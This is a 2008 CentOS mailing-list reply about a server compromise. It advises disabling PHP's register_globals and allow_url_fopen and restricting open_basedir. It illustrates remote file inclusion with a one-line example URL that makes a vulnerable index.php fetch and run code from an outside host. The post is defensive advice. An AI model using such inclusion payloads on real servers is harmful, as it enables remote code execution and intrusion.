[CentOS] mystery process "unit"
Rainer Duffner
rainer at ultra-secure.de
Tue Aug 12 16:18:45 UTC 2008
sbeam schrieb:
> On Tuesday 12 August 2008 10:16, Rainer Duffner wrote:
>
>> Anything in /tmp ?
>>
>> Disable register_globals and allow_url_fopen.
>> Set open_basedir for any virtual hosts to the absolute minimum.
>>
>
> I have mod_security installed now, but I tested a similar attack, and sadly,
> it still succeeds as long as allow_url_fopen is on. But this is not CentOS
> related.
>
Yeah, because allow_url_fopen basically means "I want to run code from
some random site", in most cases.
E.g., when they have implemented a crappy starting-page "index.php"
where there is a menu that calls index.php?link=file1.html
if item one was clicked.
Too bad people can use that to get
index.php?link=http://some.geocities.page/foo.gif executed as PHP on
your server!
(I think it requires both register_globals and allow_url_fopen to be on,
but I'm not sure if you can't get it to work with only allow_url_fopen....)
cheers,
Rainer
More information about the CentOS
mailing list